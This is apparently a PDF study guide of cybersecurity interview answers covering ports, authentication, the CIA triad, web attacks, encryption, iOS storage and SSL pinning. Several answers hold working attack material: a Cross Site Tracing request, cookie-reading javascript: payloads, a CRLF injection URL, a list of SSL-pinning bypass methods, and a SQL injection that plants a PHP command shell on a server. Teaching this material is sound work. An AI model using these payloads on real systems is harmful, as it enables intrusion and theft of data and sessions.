51) Do you prefer filtered ports or closed ports on your firewall?

Closed Port:
- If you send a SYN to a closed port, it will respond back with a RST.
Open Port:
- If you send a SYN to an open port, you would expect to receive a
SYN/ACK.
Filtered Port:
- Presumably, the host is behind some sort of firewall. If the packet is discarded and there is
no response this is typically considered a filtered port.

52) What are the three ways to authenticate a person?

Three common ways to authenticate a person:
1. Something you know (E.g. Password)
A user must know in order to login: ID, Password, PIN.
2. Something you have (E.g. Token)
Anything a user must have in his possession to log in: One time password (OTP tokens),
smartphones with OTP Apps, Employee ID card.
3. Something you are (E.g. Fingerprint/Bio metric)
Biological traits a user has that are confirmed for log in: Retina scan, Fingerprint scan,
Facial recognition, Voice recognition.

53) What are your steps when securing a server?

You can make your server more secure in 4 simple steps.

Step 1
The first thing to do is make sure that you have a secure password for your root and
administrator users. Conventional wisdom says use a mix of letters, numbers, and some
punctuation characters. Unfortunately, while that is sound advice to a point, it omits a vital
element – the password length.
Step 2
The next thing you need to do is make new users on your system. These will be the users you
use to manage the system. If you are the only person using the server, your name or
nickname are as good a username as any. If a group of people is going to be using it, then you
probably already have a username convention that you use elsewhere. In windows give the
user administrator access, and add the user to the Remote Desktop Users group, or if using
Linux, add the user to sudoers. Log-out and then log-in as your newly created user and check
that you do have sufficient administrator/root access. If that works, move on to the next step.
Step 3
Remove remote access from the default root/administrator accounts.

1|Page
Step 4
The next step is to configure your firewall rules for remote access.

54) What is more important for cybersecurity professionals to focus on, threats or
vulnerabilities?

 It is important to focus on both. Vulnerability is finding loopholes in the system and

threats makes us understand that how to deal with real time problem or attack in the
system. So vulnerability is more important to find loopholes in the system and fix them
to secure the network.

55) What is the goal of information security within an organization?

The Three Security Goals Are Confidentiality, Integrity, and Availability.

 Protect the confidentiality of data

 Preserve the integrity of data
 Promote the availability of data for authorized use

These goals form the confidentiality, integrity, availability (CIA) triad, the basis of all security
programs. Information security professionals who create policies and procedures must
consider each goal when creating a plan to protect a computer system.

1. Confidentiality: Whenever information is transmitted from one place to another, a

certain level of secrecy is maintained, which is known as confidentiality.

2. Integrity: This means that whenever there is a need for change in any document stored
beforehand or new, it can only be done by an authorized person with proper and secure
mechanism.

3. Availability: Everything that is important should be readily available to the authorized

people otherwise there will be no use of such information that is not available.

56) What is the difference between threat, vulnerability, and a risk?

A threat is from an attacker that will use a vulnerability that was not mitigated because
someone forgot to identify it as a risk.
1. Vulnerability: If your security program has a breach or weakness then different threats
can further exploit the program and thus hack into your system to access data that is stored
securely.
2. Risk: If your system is not secure enough and has the chances of getting damaged or
destruction along with loss of data when a threat exploits the vulnerability, it’s under huge
risk.

2|Page
3. Threat: Something that is necessary for exploiting the vulnerability either knowingly or
by accident in order to damage or destroy personal and official data.
57) What is the difference between Vulnerability Assessment and Penetration
Testing?
There is a considerable amount of confusion in the industry regarding the differences
between vulnerability scanning and penetration testing, as the two phrases are commonly
interchanged. However, their meaning and implications are very different. A vulnerability
assessment simply identifies and reports noted vulnerabilities, whereas a penetration test
(Pen Test) attempts to exploit the vulnerabilities to determine whether unauthorized access
or other malicious activity is possible.
58) What is Vulnerability Assessment?

Vulnerability assessment is the process of defining, identifying, classifying and prioritizing

vulnerabilities in computer systems, applications and network infrastructures and providing
the organization doing the assessment with the necessary knowledge, awareness and risk
background to understand the threats to its environment and react appropriately.
Conducting vulnerability assessments help organizations identify vulnerabilities in their
software and supporting infrastructure before a compromise can take place.
A vulnerability can be defined in two ways:
A bug in code or a flaw in software design that can be exploited to cause harm. Exploitation
may occur via an authenticated or unauthenticated attacker.
A gap in security procedures or a weakness in internal controls that when exploited results
in a security breach.
59) What is Penetration Testing?

Penetration testing (also called pen testing) is the practice of testing a computer system,
network or Web application to find vulnerabilities that an attacker could exploit.

Pen tests can be automated with software applications or they can be performed manually.
Either way, the process includes gathering information about the target before the test
(reconnaissance), identifying possible entry points, attempting to break in (either virtually
or for real) and reporting back the findings.

60) What is cross site tracing (XST)?

XST attacks are a way to bypass HTTP-Only protection.
Cross Site Tracing (XST) attacks are a form of Cross Site Scripting (XSS) attacks that exploit
the TRACE method of the HTTP Protocol.

3|Page
XST (Cross Site Tracing) is combined Attack that includes HTTP TRACE METHOD and XSS
Techniques.
How to test if your server is vulnerable to XST.
To test if your server is vulnerable I will use Burp Suite. Open Burp and choose repeater.
Change the request to something similar to:
TRACE / HTTP/1.0
Header1: <script>alert(document.cookie);</script>
The reply should look like this if TRACE is enabled:
HTTP/1.1 200 OK
Date: Sun, 23 Sep 2007 02:48:05 GMT
Server: Apache/1.3.34 (Ubuntu) mod_perl/1.29
Connection: close
Content-Type: message/http
TRACE / HTTP/1.0
Header1: <script>alert(document.cookie);</script>

Cross Site Tracing

Well Guys First of all I need a Web server to whom I've to send the request so for this im
gonna use my Localhost on port 81. and Let's Try to access it via curl.
curl -X TRACE 192.168.1.3:81
ok now let's see what is in response.

Umph As we can see TRACE in response so this method is allowed. Now Let's try to Add a
new header if we can do it by using curl's -H option.

4|Page
oh ?? injected: P, so this application is prone to xss attacks via Trace method that is inshort
called Cross Site Tracing. If we don't see TRACE in response and see a source page, then trace
method is disabled.
Defenses
Prevention of this vulnerability is really simple. If your using apache then you need to
install the mod_rewrite engine. Add the following lines to your httpd.conf file.

RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^TRACE
RewriteRule .* - [F]

If your using IIS then you need to filter out everything but GET, POST, and HEAD
with urlScan.
61) What is Self XSS?
Self-XSS is one of the popular Social Engineering Attack used by Attackers to trick users into
paste the malicious code in browser. Results in attacker accessing to the whatever website
you visit. Usually scammers use this attack for tricking users to buy products or get money
through online survey.
Javascript can be executed in browser url bar.
For example , enter the following code in your browser:
javascript:alert(‘BreakTheSecurity’);
This will show a pop up box with “BreakTheSecurity”. An attacker can use this for
malicious purpose. He can steal Confidential data, cookies, redirect to malware sites and
more.
For Eg:
Entering the following code will display the cookies in your browser:
javascript:alert(“Cookies:”+document.cookies+” “+”n By n BreakTheSecurity”);

5|Page
The above code is not going to anything maliciously other than displaying the cookies. But
an attacker can extend the script so that it can take advantage your data.
Security Tips from BreakTheSecurity:

 Use NoScript add on that will prevent javascript running in your browser.
 Don’t click the shorthand urls for Example: bit.ly/55ewEb?22. This may redirect to
an infected sites.

Aware of Social Engineering:

 If anyone ask you(even if he is your friend) to paste the scripts in browser bar, Never
do this mistake.
 If anyone says “Iphone only $10”, Don’t eager to click it.
 If anyone says “1000 shares will cure a baby”, Never do this mistake. Facebook shares
never help to get money or help to cure baby.
 Read our EHN spam report to know the latest updates about the facebook scams.

62) What is the impact of clickjacking attack?

Clickjacking is a method of tricking website users into clicking on a harmful link, by

disguising the link as something else.

It tricked the user into “Liking” an item on Facebook. Clickjacking has also been used in the
past to:

 Harvest login credentials, by rendering a fake login box on top of the real one.
 Trick users into turning on their web-cam or microphone, by rendering invisible
elements over the Adobe Flash settings page.

6|Page
  Spread worms on social media sites like Twitter and MySpace.
 Promote online scams by tricking people into clicking on things they otherwise would
not.
 Spread malware by diverting users to malicious download links.

Also, when a web site is vulnerable to clickjacking, it is possible for the attacker to disable
cross-site request forgery (CSRF) token protection, which protects against CSRF attacks that
trick browsers into doing things without the user’s knowledge or permission.
ClickJacking as a method of delivery for Blind XSS.
This vulnerability can be linked to a multitude of attacks including keylogging and stealing
user credentials.
63) What is Blind XSS?
It is a type of stored XSS where attackers input is saved by server and is reflected in a totally
different application used by system admin/team member.
Impact
There are many different attacks that can be leveraged through the use of cross-site
scripting, including:
 Hijacking user's active session.
 Mounting phishing attacks.
 Intercepting data and performing man-in-the-middle attacks.
64) What is CRLF or HTTP Response splitting?
When a browser sends a request to a web server, the web server answers back with a
response containing both the HTTP headers and the actual website content. The HTTP
headers and the HTML response (the website content) are separated by a specific
combination of special characters, namely a carriage return and a line feed. For short they
are also known as CRLF.
The server knows when a new header begins and another one ends with CRLF, which can
also tell a web application or user that a new line begins in a file or in a text block.
In a CRLF injection vulnerability attack the attacker inserts carriage return, linefeed both of
the characters into user input to trick the server, web application or the user into thinking
that an object is terminated and another one has started.
CRLF Injection Vulnerability is a web application vulnerability happens due to direct passing
of user entered data to the response header fields like (Location, Set-Cookie and etc) without
proper sanitsation, which can result in various forms of security exploits. Security exploits
range from XSS, Cache-Poisoning, Cache-based defacement, page injection and etc.

7|Page
CRLF injection, or HTTP response splitting, is a type of injection attack that can lead to Cross-
site Scripting (XSS) and web cache poisoning among others.
CRLF refers to the Carriage Return and Line Feed sequence of special characters. These two
special characters represent the End of Line (EOL) marker for many internet protocols,
including HTTP. Web applications typically split headers based on where the CRLF character
sequence is found. Therefore, if a malicious user is able to inject their own CRLF sequence
into an HTTP stream, they gain control over the contents of the HTTP response.
Since CRLF characters can be used to split an HTTP response header, it is often also referred
to as HTTP Response Splitting. The following example is a crafted request containing CRLF
(the %0d%0a characters in the request below) that causes Cross-site Scripting.
http://www.yoursite.com/somepage.php?page=%0d%0aContent-Type:
text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type:
text/html%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
The victim will see the following in their browser.
<script>alert(1)</script>
Variations of this attack can be used to poison proxy or web caches in order to get the cache
to serve the attacker’s content to other users.
Impacts of the CRLF injection Vulnerability
The impact of CRLF injections vary and also include all the impacts of Cross-site Scripting to
information disclosure. It can also deactivate certain security restrictions like XSS Filters and
the Same Origin Policy in the victim's browsers, leaving them susceptible to malicious
attacks.
65) How to Upload Shells from SQL injection?
File Upload with SQL Injection

If we find Union-Based SQL Injection, we can upload file to server. To upload a file, we
should know directory structure of the server.
As i said we need to know directory structure or root path of server and usually, we will see
directory structure in SQL errors.
Example SQL Error:
Warning: mysql_fetch_assoc() expects parameter 2 to be resource, boolean given in
C:\wamp\www\db_connect.php on line 136
In this example, the web server is running in “C:\wamp\www”. SQL query which uploads a
basic CMD shell is given below.

8|Page
Example SQL Query:
select "<? system($_GET['cmd’]);?>" into outfile "C:/wamp/www/shell.php"
Now it’s time to merge the SQL query with the SQL injection.
File Upload Example:
URL : http://www.example.com/product.php?id=5 union all select "<?
system($_GET['cmd’]); ?>",2,3,4,5,6 into outfile "C:/wamp/www/shell.php" --
SQL Query : select * from products where id=5 union all select "<? system($_GET['cmd’]);
?>",2,3,4,5,6 into outfile "C:/wamp/www/shell.php”--
Shell file is ready to be use. We can reach Shell file at http://www.example.com/shell.php .

Command Execution - "ipconfig"

Command Execution - "whoami"

If command execution via SQL injection is not enough for you, try it with metasploit.

66) What is the difference between My SQL and MS SQL?

 MySQL and MS SQL are two database systems.
 MYSQL is open source while MS SQL is closed source

9|Page
  MYSQL free to use and MS SQL requires payment for license to use
 MySQL uses lower disk space; MS SQL uses higher disk space
 MySQL cross compatible with other platforms such as Unix and Linux
 MS SQL not compatible with other platforms
 MySQL does not foreign keys while MS SQL supports their use.
67) What is a buffer overflow attack?
A buffer overflow, or buffer overrun, is a common software coding mistake that an attacker
could exploit to gain access to your system.
A buffer overflow occurs when more data are written to a buffer than it can hold. The excess
data is written to the adjacent memory, overwriting the contents of that location and causing
unpredictable results in a program. Buffer overflows happen when there is improper
validation (no bounds prior to the data being written. It is considered a bug or weakness in
the software.
A buffer is a temporary area for data storage. When more data (than was originally allocated
to be stored) gets placed by a program or system process, the extra data overflows. It causes
some of that data to leak out into other buffers, which can corrupt or overwrite whatever
data they were holding.
In a buffer-overflow attack, the extra data sometimes holds specific instructions for actions
intended by a hacker or malicious user; for example, the data could trigger a response that
damages files, changes data or unveils private information.
This vulnerability can cause a system crash or, worse, create an entry point for a cyberattack.
C and C++ are more susceptible to buffer overflow.
Attackers can exploit a buffer overflow bug by injecting code that is specifically tailored to
cause buffer overflow with the initial part of a data set, then writing the rest of the data to
the memory address adjacent to the overflowing buffer. The overflow data might contain
executable code that allows the attackers to run bigger and more sophisticated programs or
grant themselves access to the system.
There are two types of buffer overflows: stack-based and heap-based. Heap-based, which are
difficult to execute and the least common of the two, attack an application by flooding the
memory space reserved for a program. Stack-based buffer overflows, which are more
common among attackers, exploit applications and programs by using what is known as a
stack: memory space used to store user input.
68) What are Encryption, Decryption, Key & Steganography?
Encryption: It is the process of locking up information using cryptography. Information that
has been locked this way is encrypted.

10 | P a g e
Decryption: The process of unlocking the encrypted information using cryptographic
techniques.
Key: A secret like a password used to encrypt and decrypt information. There are a few
different types of keys used in cryptography.
Steganography: It is actually the science of hiding information from people who would snoop
on you. The difference between steganography and encryption is that the would-be snoopers
may not be able to tell there’s any hidden information in the first place.
69) What are differences between Symmetric & Asymmetric Encryption?

Symmetrical Encryption

This is the simplest kind of encryption that involves only one secret key to cipher and
decipher information. Symmetrical encryption is an old and best-known technique. It uses a
secret key that can either be a number, a word or a string of random letters. It is a blended
with the plain text of a message to change the content in a particular way. The sender and
the recipient should know the secret key that is used to encrypt and decrypt all the messages.
Blowfish, AES, RC4, DES, RC5, and RC6 are examples of symmetric encryption. The most
widely used symmetric algorithm is AES-128, AES-192, and AES-256.

The main disadvantage of the symmetric key encryption is that all parties involved have to
exchange the key used to encrypt the data before they can decrypt it.

11 | P a g e
Asymmetrical Encryption

Asymmetrical encryption is also known as public key cryptography, which is a relatively new
method, compared to symmetric encryption. Asymmetric encryption uses two keys to
encrypt a plain text. Secret keys are exchanged over the Internet or a large network. It
ensures that malicious persons do not misuse the keys. It is important to note that anyone
with a secret key can decrypt the message and this is why asymmetrical encryption uses two
related keys to boosting security. A public key is made freely available to anyone who might
want to send you a message. The second private key is kept a secret so that you can only
know.

A message that is encrypted using a public key can only be decrypted using a private key,
while also, a message encrypted using a private key can be decrypted using a public key.
Security of the public key is not required because it is publicly available and can be passed
over the internet. Asymmetric key has a far better power in ensuring the security of
information transmitted during communication.

Asymmetric encryption is mostly used in day-to-day communication channels, especially

over the Internet. Popular asymmetric key encryption algorithm includes EIGamal, RSA,
DSA, Elliptic curve techniques, PKCS.

Asymmetric Encryption in Digital Certificates

To use asymmetric encryption, there must be a way of discovering public keys. One typical
technique is using digital certificates in a client-server model of communication. A certificate
is a package of information that identifies a user and a server. It contains information such
as an organization’s name, the organization that issued the certificate, the users’ email
address and country, and users public key.

12 | P a g e
When a server and a client require a secure encrypted communication, they send a query
over the network to the other party, which sends back a copy of the certificate. The other
party’s public key can be extracted from the certificate. A certificate can also be used to
uniquely identify the holder.

SSL/TLS uses both asymmetric and symmetric encryption, quickly look at digitally signed
certificates issued by trusted certificate authorities (CAs).

70) What are the difference between SSL & TLS?

Secure Socket Layer (SSL) and Transport Layer Security (TLS) are protocols designed to
provide the security between the web server and web browser.
 The TLS protocol does not support Fortezza/DMS cipher suites while SSL supports
Fortezza. Also, the TLS standardization process makes it much easier to define new
cipher suites.
 In SSL to create a master secret, the message digest of the pre-master secret is used.
In contrast, TLS uses a pseudorandom function to generate master secret.
 The SSL record protocol adds MAC (Message Authentication Code) after compressing
each block and encrypts it. As against, TLS record protocol uses HMAC (Hash-based
Message Authentication Code).
 The “No certificate” alert message is included in SSL. On the other hand, TLS removes
alert description (No certificate) and adds a dozen other values.
 SSL message authentication unites key information and application data in an ad-hoc
manner, created just for the SSL protocol. Whereas, the TLS protocol just relies on a
standard message authentication code known as HMAC.
 In the TLS certificate verify the message, the MD5 and SHA-1 hashes are computed
only over handshake messages. On the contrary, in SSL the hash calculation also
includes the master secret and pad.
 As with the finished message in TLS, created by applying the PRF to the master key
and handshake messages. Whereas in SSL, it’s constructed by applying message
digest to the master key and handshake messages.
71) What an IPA file contains?
Similar to an APK for Android applications, an IPA is an archive which contains the iOS
application. Files with .ipa extension can be extracted with unzip utility to give us the
contents in the form of Payload/AppName.app folder.

Contents in an IPA
Payload - Contains the .app folder of the specific iOS application. Under the .app folder we
can see the application’s contents like the images, nib files which store the user interface and
so on.

13 | P a g e
Mach-O Executable - Mach Object files are file formats for executables.
Contains data section, header and load commands.
Info.plist - Stores the configuration information of the executable. Can be
viewed with a text editor. If it is in a binary format, can be converted using
plutil -convert xml1 Info.plist
Frameworks - Folder with libraries the application uses. There are many
third party libraries. For example, the AWS SDK.
Mobileprovision - Information such as the developer certificate, devices
for which the application is provisioned or team identifier can be found
under embedded.mobileprovision
72) What are the types of local storages in an iOS application?
Here we will explore local iOS data storage guidelines for iOS apps intended to keep certain
information locally. Local storage is meant for retaining web app data locally using certain
frameworks, tools and methods distinctive to different platforms. For iOS storage there are
different methods to choose from. The choice, however, depends upon what and how much
data you want to store. Most of the times more than one method is required to implement
local storage in iOS apps, as there are different persistence needs of the application viz. data
gathered from web browsing, user preferences, and application settings. The most widely
used methods for local storage implementation in iOS are:
 SQLite
 Property List
 Core Data
 NSUser Defaults
 Key Chain
SQLite for iOS Local Data Storage
SQLite is a powerful lightweight C library that is embedded in an iOS application. This is used
in various applications across various platforms including Android and iOS. It uses SQL-
centric API to operate the data tables directly. Using SQLite C library for local data storage
implementation in iOS applications, one needs to be very meticulous when passing in strings
and arguments required for the functions.
Property List
Another most common method of storing data in iOS application is in Property List files.
Documents in property list contain either an NSDictionary or an NSArray, inside which there
is archived data. There are number of classes that can be archived into the PList, viz. NSArray,
14 | P a g e
NSDate, NSString, NSDictionary and NSdictionary. Objects other than these cannot be
archived as a property list and will not be able to write the file. One has to be very particular
about listing items into the classes, for instance to store a Boolean or Integer object only
NSNumber class is used. Boolean or Integer object must not be given to any objects in
NSDictionary or NSArray.
Core Data
Core Data is the method recommended by Apple for local storage of app’s data. By default,
core data uses SQLite as its main database in the iOS app. Internally Core Data make use of
SQLite queries to save and store its data locally, which is why all the files are stored as .db
files. This also eliminates the need to install a separate database. In iOS this framework
allows for two different database storage types but by default it is SQLite. Core Data allows
you deal with common functionalities of an app like, restore, store, undo and redo.

NSUserDefaults
To save properties in any application and user preferences, NSUserDefaults is one of the
most common methods for local data storage. This is used to save logged in state of the user
within an application, so that the app can fetch this data even when user access the
application at some other time. In some of the iOS apps this method is used to save user’s
confidential information like access token.
Key Chain
Most of the time developers avoid implementing key chain method to save data as the
method follows a complicated procedure. If the device is jail broken, none of your data is
secure. This is the most secure and reliable method to store data on a non-jailbroken device.
Simple wrapper classes are used to store data using key chain method.
73) What is ssl pinning?
SSL Pinning is making sure the client checks the server’s certificate against a known copy of
that certificate. Simply bundle your server’s SSL certificate inside your application, and make
sure any SSL request first validates that the server’s certificate exactly matches the bundle’s
certificate. SSL pinning prevents someone from using a false SSL certificate to breach the
trust between users, developers, and applications.
Typically, during the SSL or TLS handshake, when a client connects to a server, the server
sends its digital certificate. If the certificate is issued by a Certificate Authority that is trusted
by the mobile device OS, the connection is allowed. The data is sent through the connection,
and is encrypted with the server’s public key. This process establishes a trust relationship.
An attacker performing a “man in the middle” attack, makes the mobile device trust the
attacker’s certificate. Typically, an attacker's certificate is not signed by a Certificate
Authority trusted by the mobile device OS, but there is no certainty. In iOS 4.3.5, there was a

15 | P a g e
vulnerability where "an attacker with a privileged network position" could capture or modify
data in sessions that were protected by SSL/TLS.
BENEFITS
Increased security - with pinned SSL certificates, the app is independent of the device’s
trust store. Compromising the hard coded trust store in the app is not so easy - the app would
need to be decompiled, changed and then recompiled again - and it can’t be signed using the
same Android keystore that the original developer of the app used.
Reduced costs - SSL certificate pinning gives you the possibility to use a self-signed
certificate that can be trusted. For example, you’re developing an app that uses your own API
server. You can reduce the costs by using a self-signed certificate on your server (and pinning
that certificate in your app) instead of paying for a certificate. Although a bit convoluted, this
way, you've actually improved security and saved yourself some money.
DRAWBACKS
Less flexibility - when you do SSL certificate pinning, changing the SSL certificate is not that
easy. For every SSL certificate change, you have to make an update to the app, push it to
Google Play and hope the users will install it.
74) How to bypass ssl pinning?
 Disable Certificate pinning in code with decompiling APK and compiling again.
 Disable SSL Pinning with special tool inside in your phone (SSL Kill Switch)
 Disable SSL Pining with IPAPatch tool for iOS
 Adding a custom CA to the trusted certificate store
 Overwriting a packaged CA cert with a custom CA cert
 Using Frida to hook and bypass SSL certificate checks
 Reversing custom certificate code
75) What is AAA?
Authentication is the process of identifying an individual, usually based on a username and
password. Authentication is based on the idea that each individual user will have unique
information that sets him or her apart from other users.
Authorization is the process of granting or denying a user access to network resources once
the user has been authenticated through the username and password. The amount of
information and the amount of services the user has access to depend on the user's
authorization level.
Accounting is the process of keeping track of a user's activity while accessing the network
resources, including the amount of time spent in the network, the services accessed while
there and the amount of data transferred during the session. Accounting data is used for
trend analysis, capacity planning, billing, auditing and cost allocation.

16 | P a g e
AAA services often require a server that is dedicated to providing the three services. RADIUS
is an example of an AAA service.

17 | P a g e